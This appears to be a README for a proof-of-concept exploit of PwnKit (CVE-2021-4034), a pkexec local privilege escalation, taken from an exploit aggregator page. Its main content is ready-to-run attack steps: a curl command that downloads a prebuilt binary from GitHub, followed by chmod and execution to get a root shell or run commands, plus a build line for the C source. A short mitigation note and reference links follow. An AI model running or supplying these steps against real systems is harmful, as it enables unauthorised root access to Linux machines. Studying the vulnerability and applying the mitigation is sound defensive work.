## https://sploitus.com/exploit?id=7C600E50-B6A9-5CD1-90DE-726205482F77
# PwnKit
PoC for PwnKit / CVE-2021-4034 - Pkexec Local Privilege Escalation
## Exploit
### Manually
```bash
curl -fsSL https://raw.githubusercontent.com/jayhutajulu1/PwnKit-CVE-2021-4034/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command
```
### Patched
Running the exploit against patched versions will yield the following output.
### Build
```bash
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
```
### Mitigation
If no patches are available for your operating system, you can remove the SUID-bit from pkexec as a temporary mitigation.
```bash
# chmod 0755 /usr/bin/pkexec
```
## Technical Details
- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
## References
- https://github.com/arthepsy/CVE-2021-4034/